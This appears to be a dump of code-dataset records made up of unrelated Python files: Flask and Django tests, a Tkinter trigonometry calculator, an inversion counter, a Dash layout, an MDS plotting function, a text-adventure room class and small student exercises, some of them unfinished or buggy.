= logout(self.client)\n\n#===============================================================================\n# def test_a_get_all_fases(self):\n# \"\"\"Prueba que verifica si se puede acceder al listado de fases\"\"\"\n# print '##----++++ PRUEBA UNITARIA FASE ++++----##'\n# print '+++ Obtener todas las fases +++'\n# request = self.client.get('/fase/administrarfase', follow_redirects=True)\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', request.data, 'No tiene permisos para ver las fases')\n# self.assertEqual(request._status, '200 OK', 'Error al obtener las fases como '+ TEST_USER_LIDER)\n# print '*-- Obtiene todos las fases -- request result: ' + request._status + ' --*'\n# print'*---test 1 fase---*'\n# \n# def test_b_crear_fases(self): \n# \"\"\" Prueba de creacion de fase y verifica si la fase fue creada\"\"\"\n# print '+++ Creacion de fase +++'\n# request = self._crear_fase(nro_orden, nombre, descripcion, estado, fecha_inicio, fecha_fin, id_proyecto)\n# print '*-- datos de prueba ::: ' + str(nro_orden) + ', '+ nombre+', '+ descripcion+', ' +estado + ', ' + str(fecha_inicio) +', '+ str(fecha_fin) +', '+ str(id_proyecto) +' --*'\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', request.data, 'No tiene permisos para crear fases')\n# self.assertNotIn('Error', request.data, 'Tiene errores el form')\n# self.assertIn('La fase ha sido registrada con exito', request.data, 'Error al crear la fase')\n# print '*-- request result: ' + request._status + ' --*'\n# self.assertIn(nombre, request.data, 'La fase creada no se encuentra en la tabla')\n# print '*-- '+nombre+' creada correctamente, aparece en la tabla de fases--*'\n# print '*---test 2 fase---*'\n# \n# def test_c_crear_fase_duplicado(self):\n# \"\"\"Prueba si se pueden crear fase duplicados\"\"\"\n# print '+++ Creacion de fase con mismo numero orden duplicado +++'\n# request = self._crear_fase(nro_orden, nombre, descripcion, estado, fecha_inicio, fecha_fin, id_proyecto)\n# print '*-- datos de prueba ::: ' + str(nro_orden) + ', '+ nombre+', '+ descripcion+', ' +estado + ', ' + str(fecha_inicio) +', '+ str(fecha_fin) +', '+ str(id_proyecto) +' --*'\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', request.data, 'No tiene permisos para crear fases')\n# self.assertNotIn('Error', request.data, 'Tiene errores el form')\n# self.assertIn('Clave unica violada por favor ingrese otro NUMERO de Fase', request.data, 'Fase creada, no existe el numero de orden para la nueva fase')\n# self.assertIn(str(nro_orden), request.data, 'La fase creada no se encuentra en la tabla')\n# print '*-- Verificacion completa, no se pueden crear dos fases con el mismo numero de orden --*'\n# print '*---test 3 fase---*'\n# \n# def test_d_buscar_fase(self):\n# \"\"\"Prueba de busqueda de una fase\"\"\"\n# print '+++ Buscar una fase existente por nombre +++'\n# request = self._buscar_fase(PATRON, PARAM)\n# print '*-- datos de prueba ::: patron = '+ PATRON +', parametro = '+PARAM+' --*'\n# self.assertNotIn('Sin permisos para buscar fase', request.data, 'No tiene permisos para ver las fases')\n# self.assertNotIn('Sin registro de fases', request.data, 'No se encontro fases con dicho parametro')\n# self.assertIn(PATRON, request.data, 'La fase no existe en la tabla')\n# print '*-- Fase encontrada exitosamente --*'\n# print '*---test 4 fase---*'\n# \n# def test_e_editar_fase(self):\n# \"\"\" Prueba para editar una fase \"\"\" \n# print '+++ Edicion de fase +++'\n# request = self._editar_fase(nro_orden, nombre, 'decrip editada', estado, fecha_inicio, fecha_fin, id_proyecto)\n# print '*-- datos de prueba ::: ' + str(nro_orden) + ', '+ nombre+', '+ 'decrip editada'+', ' +estado + ', ' + str(fecha_inicio) +', '+ str(fecha_fin) +', '+ str(id_proyecto) +' --*'\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', request.data, 'No tiene permisos para editar fases')\n# self.assertNotIn('Error', request.data, 'Tiene errores el form')\n# self.assertIn('La fase ha sido editada con exito', request.data, 'Error al editar la fase')\n# print '*-- request result: ' + request._status + ' --*'\n# self.assertIn(nombre, request.data, 'La fase creada no se encuentra en la tabla')\n# print '*-- '+nombre+' creada correctamente, aparece en la tabla de fases--*'\n# print '*---test 5 fase---*'\n# \n# def test_f_eliminar_fase(self):\n# \"\"\"Prueba de verificacion si se puede eliminar una fase\"\"\"\n# print '+++ Eliminacion de proyecto existente +++'\n# borrar_request = self._eliminar_fase(nro_orden)\n# print '*-- datos de prueba ::: numero orden = ' + str(nro_orden) +' --*'\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', borrar_request.data, 'No tiene permisos para eliminar fases')\n# self.assertIn('La fase ha sido eliminado con exito', borrar_request.data, 'Fase creada, no existe el nro_oden fase')\n# self.assertNotIn(str(nombre), borrar_request.data, 'La fase no ha sido borrado')\n# print '*-- Verificacion completa, se elimino correctamente--*'\n# print '*---test 6 fase---*'\n# print '##----++++ FIN PRUEBA UNITARIA FASE ++++----##'\n#===============================================================================\n \n def _crear_fase(self, nro_orden=nro_orden, nombre=nombre, descripcion=descripcion, estado=estado, fecha_inicio=fecha_inicio,\n fecha_fin=fecha_fin, id_proyecto=id_proyecto): \n request = self.client.post('/fase/nuevafase', data=dict(\n nro_orden = nro_orden,\n nombre = nombre,\n descripcion = descripcion,\n estado = estado,\n fecha_inicio = fecha_inicio,\n fecha_fin = fecha_fin,\n id_proyecto = id_proyecto), follow_redirects=True)\n return request\n \n def _editar_fase(self, nro_orden=nro_orden, nombre=nombre, descripcion='decrip editada', estado=estado, fecha_inicio=fecha_inicio,\n fecha_fin=fecha_fin, id_proyecto=id_proyecto): \n request = self.client.post('/fase/editarfase', data=dict(\n nro_orden = nro_orden,\n nombre = nombre,\n descripcion = descripcion,\n estado = estado,\n fecha_inicio = fecha_inicio,\n fecha_fin = fecha_fin,\n id_proyecto = id_proyecto), follow_redirects=True)\n return request\n \n def _buscar_fase(self, patron = PATRON , parametro = PARAM ):\n request = self.client.get('/fase/buscarfase2?patron='+patron+'¶metro='+parametro+'&Buscar=Buscar', follow_redirects=True)\n return request\n\n def _eliminar_fase(self, nro_orden=nro_orden): \n request = self.client.post('/fase/eliminarfase?nro='+str(nro_orden), follow_redirects=True)\n return request\n \n def _get(self, url ='/fase/administrarfase'):\n \"\"\"obtiene la pagina administrar fases \"\"\"\n return self.client.get(url, follow_redirects=True)\n \nif __name__ == '__main__':\n unittest.main()","sub_path":"src/test/testfase.py","file_name":"testfase.py","file_ext":"py","file_size_in_byte":8475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"366834468","text":"import os\nimport openai\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\nresponse = openai.Completion.create(\n engine=\"davinci-codex\",\n prompt=\"### Postgres SQL tables, with their properties:\\n#\\n# Employee(id, name, department_id)\\n# Department(id, name, address)\\n# Salary_Payments(id, employee_id, amount, date)\\n#\\n### A query to list the names of the departments which employed more than 10 employees in the last 3 months\\nSELECT\",\n temperature=0,\n max_tokens=150,\n top_p=1.0,\n frequency_penalty=0.0,\n presence_penalty=0.0,\n stop=[\"#\", \";\"]\n)\n","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179447875","text":"from tkinter import *\r\nimport math\r\nfrom tkinter import messagebox\r\n\r\ndef run():\r\n \"\"\" () -> None\r\n\r\n Koristi se u glavnom programu za pokretanje ovog modula.\r\n \"\"\"\r\n def f_sin():\r\n \"\"\" () -> None\r\n\r\n Izračunava sinus zadanog koda\r\n \"\"\"\r\n global sin_print\r\n\r\n try:\r\n kut = float(kut_unos.get())\r\n except:\r\n kut=0\r\n try:\r\n min = float(min_unos.get())\r\n except:\r\n min=0\r\n try:\r\n sec = float(sec_unos.get())\r\n except:\r\n sec=0\r\n\r\n broj = (((sec/60) + min)/60) + kut\r\n\r\n if broj<=0 or broj>=90:\r\n messagebox.showwarning(\"Upozorenje\", \"Unesi mjeru kuta između 0 i 90\")\r\n\r\n else:\r\n\r\n vr = math.sin(math.radians(broj))\r\n vr = round(vr, 5)\r\n\r\n sin_print = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=vr)\r\n sin_print.grid(row=2, column=1)\r\n\r\n kut_unos.configure(state=\"disabled\")\r\n min_unos.configure(state=\"disabled\")\r\n sec_unos.configure(state=\"disabled\")\r\n\r\n def f_cos():\r\n \"\"\" () -> None\r\n\r\n Izračunava kosinus zadanog koda\r\n \"\"\"\r\n global cos_print\r\n\r\n try:\r\n kut = float(kut_unos.get())\r\n except:\r\n kut=0\r\n try:\r\n min = float(min_unos.get())\r\n except:\r\n min=0\r\n try:\r\n sec = float(sec_unos.get())\r\n except:\r\n sec=0\r\n\r\n broj = (((sec / 60) + min) / 60) + kut\r\n\r\n if broj <= 0 or broj >= 90:\r\n messagebox.showwarning(\"Upozorenje\", \"Unesi mjeru kuta između 0 i 90\")\r\n\r\n else:\r\n\r\n vr = math.cos(math.radians(broj))\r\n vr = round(vr, 5)\r\n\r\n cos_print = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=vr)\r\n cos_print.grid(row=3, column=1)\r\n\r\n kut_unos.configure(state=\"disabled\")\r\n min_unos.configure(state=\"disabled\")\r\n sec_unos.configure(state=\"disabled\")\r\n\r\n def f_tg():\r\n \"\"\" () -> None\r\n\r\n Izračunava tangens zadanog koda\r\n \"\"\"\r\n global tg_print\r\n\r\n try:\r\n kut = float(kut_unos.get())\r\n except:\r\n kut=0\r\n try:\r\n min = float(min_unos.get())\r\n except:\r\n min=0\r\n try:\r\n sec = float(sec_unos.get())\r\n except:\r\n sec=0\r\n\r\n broj = (((sec / 60) + min) / 60) + kut\r\n\r\n if broj <= 0 or broj >= 90:\r\n messagebox.showwarning(\"Upozorenje\", \"Unesi mjeru kuta između 0 i 90\")\r\n\r\n else:\r\n\r\n vr = math.tan(math.radians(broj))\r\n vr = round(vr, 5)\r\n\r\n tg_print = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=vr)\r\n tg_print.grid(row=4, column=1)\r\n\r\n kut_unos.configure(state=\"disabled\")\r\n min_unos.configure(state=\"disabled\")\r\n sec_unos.configure(state=\"disabled\")\r\n\r\n def f_ctg():\r\n \"\"\" () -> None\r\n\r\n Izračunava kotangens zadanog koda\r\n \"\"\"\r\n global ctg_print\r\n\r\n try:\r\n kut = float(kut_unos.get())\r\n except:\r\n kut=0\r\n try:\r\n min = float(min_unos.get())\r\n except:\r\n min=0\r\n try:\r\n sec = float(sec_unos.get())\r\n except:\r\n sec=0\r\n\r\n broj = (((sec / 60) + min) / 60) + kut\r\n\r\n if broj <= 0 or broj >= 90:\r\n messagebox.showwarning(\"Upozorenje\", \"Unesi mjeru kuta između 0 i 90\")\r\n\r\n else:\r\n\r\n vr = 1 / (math.tan(math.radians(broj)))\r\n vr = round(vr, 5)\r\n\r\n ctg_print = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=vr)\r\n ctg_print.grid(row=5, column=1)\r\n\r\n kut_unos.configure(state=\"disabled\")\r\n min_unos.configure(state=\"disabled\")\r\n sec_unos.configure(state=\"disabled\")\r\n\r\n def reset():\r\n \"\"\" () -> None\r\n\r\n Pritiskom na gumb unutar programa ponovno ga pokreće\r\n \"\"\"\r\n sin_print.destroy()\r\n cos_print.destroy()\r\n tg_print.destroy()\r\n ctg_print.destroy()\r\n\r\n kut_unos.configure(state=\"normal\")\r\n min_unos.configure(state=\"normal\")\r\n sec_unos.configure(state=\"normal\")\r\n\r\n\r\n main = Tk()\r\n\r\n main.title(\"Trigonometrija\")\r\n main.configure(bg=\"grey\")\r\n\r\n title = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 18 bold\", text=\"Trigonometrija šiljastog kuta pravokutnog trokuta\")\r\n title.grid(row=0, columnspan=5)\r\n\r\n kut_text = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=\"Unesi mjeru kuta:\")\r\n kut_text.grid(row=1, column=0)\r\n\r\n kut_unos = Entry(main)\r\n kut_unos.grid(row=1, column=1)\r\n\r\n min_unos = Entry(main)\r\n min_unos.grid(row=1, column=2)\r\n\r\n sec_unos = Entry(main)\r\n sec_unos.grid(row=1, column=3)\r\n\r\n sin = Button(main, text=\"Izračunaj sinus kuta\", command=f_sin)\r\n sin.grid(row=2, column=0)\r\n\r\n cos = Button(main, text=\"Izračunaj kosinus kuta\", command=f_cos)\r\n cos.grid(row=3, column=0)\r\n\r\n tg = Button(main, text=\"Izračunaj tangens kuta\", command=f_tg)\r\n tg.grid(row=4, column=0)\r\n\r\n ctg = Button(main, text=\"Izračunaj kotangens kuta\", command=f_ctg)\r\n ctg.grid(row=5, column=0)\r\n\r\n reset = Button(main, text=\"Ponovno pokretanje\", command=reset)\r\n reset.grid(row=6, column=5, sticky=E)\r\n\r\n main.mainloop()","sub_path":"trigonometrija.py","file_name":"trigonometrija.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"626506161","text":"import math\ndef count_inversions(A, p, r):\n if p < r:\n q = math.floor((p + r) / 2)\n left = count_inversions(A, p, q)\n right = count_inversions(A, q + 1, r)\n if left == None:\n left = 0\n if right == None:\n right = 0\n inversions = merge_inversions(A, p, q, r) + left + right\n return inversions\n\ndef merge_inversions(A, p, q, r):\n n1 = q - p + 1\n n2 = r - q\n L,R = [0]*(n1+1),[0]*(n2+1)\n for i in range(0,n1):\n L[i] = A[p + i]\n for j in range(0,n2):\n R[j] = A[q + j + 1]\n L[n1] = math.inf\n R[n2] = math.inf\n i = 0\n j = 0\n inversions = 0\n for k in range(p,r+1):\n if L[i] <= R[j]:\n A[k] = L[i]\n i = i + 1\n else:\n inversions = inversions + n1 - i\n A[k] = R[j]\n j = j + 1\n return inversions\n\na = [2,3,8,6,1]\nprint(count_inversions(a,0,len(a)-1))\n","sub_path":"2-Getting_Started/2-4-Count-Inversions.py","file_name":"2-4-Count-Inversions.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"115241862","text":"\"\"\"This an about tab\n\nworks as any other tab but contains text about the project, authors, etc.\n\"\"\"\n\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\nfrom tools.factories import jumbotron_from_title_paragraphs\nfrom data.markdowns import CONTRIBUTORS_MARKDOWN_TEXT, PROJECT_DETAILS_MARKDOWN\n\n\nj_title = 'Project name'\nj_text = ['Quick project description text']\nabout_jumbotron = jumbotron_from_title_paragraphs(j_title, j_text)\n\nproject_card = dbc.Card([\n dbc.CardHeader('Project details or something', className='lead'),\n dbc.CardBody(dcc.Markdown(PROJECT_DETAILS_MARKDOWN))\n])\n\n\ncontributors_card = dbc.Card([\n dbc.CardHeader('Contributors', className='lead'),\n dbc.CardBody(dcc.Markdown(CONTRIBUTORS_MARKDOWN_TEXT))\n])\n\n\n# tab container, which is imported by tabindex\n# divided in rows with dbc.Row()\n# rows typically one or many cards, split by cols\n# self contained cards may be placed in a separate file and imported\nabout_tab_layout = dbc.Container([\n dbc.Row([\n dbc.Col([\n about_jumbotron,\n ])\n ]),\n\n dbc.Row([\n dbc.Col([project_card], width=6),\n dbc.Col([contributors_card], width=3),\n #dbc.Col([], width=1)\n ], justify='around'),\n], fluid=True, id='example-tab')\n\n","sub_path":"dashapp/about/abouttab.py","file_name":"abouttab.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"654447959","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 2 21:22:30 2014\n\n@author: atproofer\n\"\"\"\n\n# Author: Nelle Varoquaux \n# Licence: BSD\n#\n#print(__doc__)\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import LineCollection\n\nfrom sklearn import manifold\nfrom sklearn.metrics import euclidean_distances\nfrom sklearn.decomposition import PCA\n\ndef plot_MDS_other(diff_matrix,n):\n X_true = diff_matrix\n similarities = euclidean_distances(diff_matrix)\n seed = 1\n \n\n mds = manifold.MDS(n_components=n, max_iter=3000, eps=1e-9, random_state=seed,\n dissimilarity=\"precomputed\", n_jobs=1)\n pos = mds.fit(similarities).embedding_\n \n# nmds = manifold.MDS(n_components=2, metric=False, max_iter=3000, eps=1e-12,\n# dissimilarity=\"precomputed\", random_state=2, n_jobs=1,\n# n_init=1)\n# npos = nmds.fit_transform(similarities, init=pos)\n \n # Rescale the data\n pos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((pos ** 2).sum())\n# npos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((npos ** 2).sum())\n \n # Rotate the data\n clf = PCA(n_components=2)\n X_true = clf.fit_transform(X_true)\n \n pos = clf.fit_transform(pos)\n# \n# npos = clf.fit_transform(npos)\n \n fig = plt.figure(1)\n ax = plt.axes([0., 0., 1., 1.])\n \n plt.scatter(X_true[:, 0], X_true[:, 1], c='r', s=20)\n plt.scatter(pos[:, 0], pos[:, 1], s=20, c='g')\n plt.scatter(npos[:, 0], npos[:, 1], s=20, c='b')\n plt.legend(('True position', 'MDS', 'NMDS'), loc='best')\n \n similarities = similarities.max() / similarities * 100\n similarities[np.isinf(similarities)] = 0\n \n # Plot the edges\n start_idx, end_idx = np.where(pos)\n #a sequence of (*line0*, *line1*, *line2*), where::\n # linen = (x0, y0), (x1, y1), ... (xm, ym)\n segments = [[X_true[i, :], X_true[j, :]]\n for i in range(len(pos)) for j in range(len(pos))]\n values = np.abs(similarities)\n lc = LineCollection(segments,\n zorder=0, cmap=plt.cm.hot_r,\n norm=plt.Normalize(0, values.max()))\n lc.set_array(similarities.flatten())\n lc.set_linewidths(0.5 * np.ones(len(segments)))\n ax.add_collection(lc)\n \n plt.show()","sub_path":"hw5/editedMDS.py","file_name":"editedMDS.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"638871752","text":"# tuple_1 = ()\n# tuple_2 = (1,2,3,4,5)\n# tuple_3 = tuple(range(5,11))\n# tuple_4 = tuple('Python')\n# print(tuple_4[5])\n\ndict_1 = dict(one=1, two=2, three=3)\n# print(dict_1)\n\nb = {'one': 1, 'two': 2, 'three': 3}\n# print(b)\n\nd = dict([('two', 2), ('one', 1), ('three', 3)])\n# print(d)\n\ne = dict({'three': 3, 'one': 1, 'two': 2})\n# print(e)\n#\n# print(dict_1['one'])\n#\n# print(2 in d)\n# print('three' in d)\n\n# print(list(b.items()))\n#\n# # items = b.items()\n# # new_items = list(items)\n# # new_items.append(('four', 4))\n# # print(new_items)\n# # b = dict(new_items)\n# # print(b)\n# # b['five'] = 5\n# # print(b)\n# print(list(b.values()))\n# b.update( z = 3)\n# print(b)\nnumber_1 = 20\nnumber_2 = 40\ndef our_first_function(number):\n\n return number/ 2\n\n\n\n\n\n\nresult = our_first_function(number_1)\nprint(result)\n\n\n","sub_path":"Python day3.py","file_name":"Python day3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"282960498","text":"# Implement a class to hold room information. This should have name and\n# description attributes.\nclass Room:\n def __init__(self, name, description, items=None, hidden=\"False\", locked=\"False\"):\n self.name = name\n self.description = description\n if items is None:\n self.contains = []\n else:\n self.contains = items\n self.n_to = None\n self.e_to = None\n self.s_to = None\n self.w_to = None \n self.hidden = hidden\n self.locked = locked\n # def __str__(self):\n # roomstr = f\"{self.name}\\n\\n\"\n # roomstr += f\" {self.description}\\n\\n\"\n # roomstr += f\"Possible directions: {self.get_exits()}\\n\"\n # return roomstr\n\n def get_items_str(self):\n return ' - '.join([str(i) for i in self.contains])\n\n # def get_exits(self):\n # hidden = []\n # exits = []\n # if self.n_to is not None:\n # if room[self.n_to].hidden == True:\n # hidden.append('N')\n # else:\n # exits.append('N')\n # if self.e_to is not None:\n # if room[self.e_to].hidden == True:\n # hidden.append('E')\n # else:\n # exits.append('E')\n # if self.s_to is not None:\n # if room[self.s_to].hidden == True:\n # hidden.append('S')\n # else:\n # exits.append('S')\n # if self.w_to is not None:\n # if room[self.w_to].hidden == True:\n # hidden.append('W')\n # else:\n # exits.append('W')\n # return \" | \".join(exits)\n\n def get_room_in_direction(self, direction):\n if direction == \"n\":\n return self.n_to\n elif direction == \"e\":\n return self.e_to\n elif direction == \"s\":\n return self.s_to\n elif direction == \"w\":\n return self.w_to\n else:\n return None\n\n def add_item(self, item):\n self.contains = []\n self.contains.append(item)","sub_path":"src/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"98215088","text":"import unittest\nimport decimal\n\nfrom auth.models import User\nfrom models import *\nfrom for_sale.models import Item\nfrom market.models import MarketPlace, MarketCategory, MarketSubCategory\nfrom shops.models import Shop\nfrom inventory.models import Product\nfrom preferences.models import TaxState, ShippingWeight, ShippingItem, ShippingPrice\n\nclass BuyItemTestCase(unittest.TestCase):\n \n def setUp(self):\n self.user = User.objects.create_user(\"test\", \"t@t.com\", \"testpw\")\n self.marketplace = MarketPlace(name=\"greatsomething\", title=\"Great Something\", slug=\"great-something\", \n template_prefix=\"default\", base_domain=\"greatsomething.com\")\n self.marketplace.save()\n self.shop = Shop(marketplace=self.marketplace, admin=self.user, name=\"test shop\")\n self.shop.save()\n self.category = MarketCategory(marketplace=self.marketplace, name=\"Category1\")\n self.category.save()\n self.subcategory = MarketSubCategory(marketplace=self.marketplace, parent=self.category, name=\"SubCategory1\")\n self.subcategory.save()\n self.cart = Cart(shop=self.shop, bidder=self.user)\n self.cart.save()\n \n \n def tearDown(self):\n self.user.delete()\n self.marketplace.delete()\n self.category.delete()\n self.subcategory.delete()\n# item.delete()\n \n def testCartMethods(self):\n item = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=5, \n weight=\"2.0\")\n item.save()\n \n \n shippingdata = ShippingData(street_address=\"Calle 8 n 182\", city=\"La Plata\", state=\"Buenos Aires\", zip=\"1900\", country=\"AR\")\n shippingdata.save()\n\n self.cart.shippingdata = shippingdata\n \n qty = item.qty\n #add an item to cart\n qty_to_buy = 2\n self.cart.add(item, item.price, qty=qty_to_buy)\n \n #check that qty item decrease in one unit\n self.assertEqual(qty, item.qty + qty_to_buy)\n \n #check that item is in cart\n cart_item = self.cart.cartitem_set.all()[0]\n self.assertEqual(item, cart_item.product)\n \n #check cart methods\n self.assertEqual(self.cart.total_items(), qty_to_buy)\n self.assertEqual(self.cart.total_weight() , decimal.Decimal(\"4.0\"))\n self.assertEqual(self.cart.total(), decimal.Decimal(\"20.0\"))\n self.assertEqual(self.cart.total_with_taxes(), decimal.Decimal(\"20.0\"))\n \n #clean the cart\n self.cart.clean()\n \n #recheck cart methods\n self.assertEqual(self.cart.total_items(), 0)\n self.assertEqual(self.cart.total_weight() , decimal.Decimal(\"0.0\"))\n self.assertEqual(self.cart.total(), decimal.Decimal(\"0.0\"))\n self.assertEqual(self.cart.total_with_taxes(), decimal.Decimal(\"0.0\"))\n \n \n def testTaxCalculation(self):\n item = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=5, \n weight=\"2.0\")\n item.save()\n \n #load some taxes \n miami_tax = decimal.Decimal(\"2.5\")\n tax_for_miami = TaxState(shop=self.shop, state=\"MI\", tax=miami_tax)\n tax_for_miami.save()\n \n ny_tax = decimal.Decimal(\"1.5\")\n tax_for_ny = TaxState(shop=self.shop, state=\"NY\", tax=ny_tax)\n tax_for_ny.save()\n \n #add an item to the cart\n self.cart.add(item, item.price, qty=1)\n \n #set the shipping address \n shippingdata = ShippingData(street_address=\"Abey Road\", city=\"Great Beach\", state=\"MI\", zip=\"11001\", country=\"US\")\n shippingdata.save()\n self.cart.shippingdata = shippingdata\n \n #check that tax is correctly calculated\n self.assertEquals(self.cart.taxes(), miami_tax * decimal.Decimal(item.price) / decimal.Decimal(\"100.0\"))\n self.assertNotEquals(self.cart.taxes(), ny_tax * decimal.Decimal(item.price) / decimal.Decimal(\"100.0\"))\n\n #if shipping address is not MI or NY, no tax must be applied...\n shippingdata = ShippingData(street_address=\"Abey Road\", city=\"Great Beach\", state=\"IO\", zip=\"11001\", country=\"US\")\n shippingdata.save()\n self.cart.shippingdata = shippingdata\n\n self.assertEquals(self.cart.taxes(), decimal.Decimal(\"0.0\") ) \n \n \n def testShippingCharge(self):\n item = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=5, \n weight=\"2.0\")\n item.save()\n #add an item to the cart\n self.cart.add(item, item.price, qty=3)\n \n #set the shipping address \n shippingdata = ShippingData(street_address=\"Abey Road\", city=\"Great Beach\", state=\"MI\", zip=\"11001\", country=\"US\")\n shippingdata.save()\n self.cart.shippingdata = shippingdata\n \n sw1 = ShippingWeight(shop=self.shop, name=\"Shipping by Weight\", price=\"3.00\", from_weight=\"0.0\", to_weight=\"5.0\")\n sw1.save()\n sw2 = ShippingWeight(shop=self.shop, name=\"Shipping by Weight\", price=\"5.00\", from_weight=\"5.0\", to_weight=\"10.0\")\n sw2.save()\n self.assertEquals(self.cart.shipping_charge(), decimal.Decimal(\"5.0\"))\n sw1.delete()\n sw2.delete()\n \n si1 = ShippingItem(shop=self.shop, name=\"Shipping by Item\", price=\"9.00\", from_item=0, to_item=3)\n si1.save()\n si2 = ShippingItem(shop=self.shop, name=\"Shipping by Item\", price=\"19.00\", from_item=3, to_item=5)\n si2.save()\n si3 = ShippingItem(shop=self.shop, name=\"Shipping by Item\", price=\"29.00\", from_item=5, to_item=15)\n si3.save()\n \n self.assertEquals(self.cart.shipping_charge(), decimal.Decimal(\"9.0\"))\n si1.delete()\n si2.delete()\n si3.delete()\n \n pw1 = ShippingPrice(shop=self.shop, name=\"Shipping by Price\", price=\"5.00\", from_price=\"0.0\", to_price=\"20.0\")\n pw1.save()\n pw2 = ShippingPrice(shop=self.shop, name=\"Shipping by Price\", price=\"9.00\", from_price=\"20.0\", to_price=\"40.0\")\n pw2.save()\n self.assertEquals(self.cart.shipping_charge(), decimal.Decimal(\"9.0\"))\n pw1.delete()\n pw2.delete()\n \n \n def testCartClose(self):\n item = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=2, \n weight=\"2.0\")\n item.save()\n \n item2 = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=2, \n weight=\"2.0\")\n item2.save()\n \n shippingdata = ShippingData(street_address=\"Calle 8 n 182\", city=\"La Plata\", state=\"Buenos Aires\", zip=\"1900\", country=\"AR\")\n shippingdata.save()\n \n #add the shipping data\n self.cart.shippingdata = shippingdata\n self.cart.save()\n \n #add 2 items\n self.cart.add(item, item.price, qty=1)\n self.cart.add(item2, item.price, qty=2)\n \n #close the cart\n sell = self.cart.close(\"manual\")\n \n #check that the sell object has the default values setted... \n self.assertEquals(self.cart.total_items(), 0)\n self.assertEquals(sell.closed, False)\n self.assertEquals(sell.sellitem_set.count(), 2)\n self.assertEquals(sell.payment.state_actual.state, \"PE\")\n self.assertEquals(sell.shipping.state_actual.state, \"PE\")\n \n ","sub_path":"stores/apps/sell/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"642922791","text":"import functools\nimport typing\nimport string\nimport random\nimport pytest\n\n## Lösung Teil 1.\ndef nwords(s: str)-> int:\n \"\"\"\n Die Funktion nwords berechenet zu einem String Argument s die Anzahl der Worte im String.\n \n args:\n s(str): Text \n return:\n Anzahl an Wörter im Text\n \n \"\"\"\n if len(s) == 0:\n return 0\n result = 1\n for element in s:\n if element == (\" \"):\n result += 1\n return result\n## Lösung Teil 2.\ndef word_count_iter(m):\n \"\"\"\n Die Funktion word_count_iter\n args:\n m: iterierbares Objekt\n return:\n Tupel aus der Anzahl der Zeilen, der Anzahl der Worte und der Anzahl der Zeichen liefert, die aus dem Argument gelesen worden sind\n \"\"\"\n zeilen = 0\n worte = nwords(m)\n zeicher = len(m)\n for element in m:\n yield element\n zeilen += 1\n \n return (zeilen, worte, zeichen)\n \n######################################################################\n## Lösung Teil 3. (Tests)\nassert word_count_iter(\"Hallo das ist ein test\") == (1,5,23)\n## revert\ntry:\n word_count_iter = word_count_iter.__wrapped__\nexcept:\n pass\n\n## Lösung Teil 4.\n\n######################################################################\n","sub_path":"StudentProblem/10.21.12.4/1/1569575864.py","file_name":"1569575864.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"465333283","text":"#!/usr/bin/python\n\n# $ python3 parser_worklaod_stats.out \n#\n# Parses the statistic printed by the CODES synthetic workloads.\n# Reads all *.out files in the provided location\n# Updated 20200302\n\nimport os\nimport re\nimport sys\nimport stat\nimport csv\nimport glob\nfrom random import randint\nfrom pprint import pprint\n\n\n#if len(sys.argv) != 2:\n#\tprint(\"ERROR | Too many command line arguments.\")\n#\texit(1)\n\n\n# Read input: sys_size\n#sys_size = int(sys.argv[1])\n#num_allocs = int(sys.argv[2])\nbasedir = '/home/kabrown/case-studies/qos-swm/experiments'\nlevel = 'coarse'\nallocname = 'alloc1'\noutdir = basedir + '/' + allocname\nlpiopath = outdir + 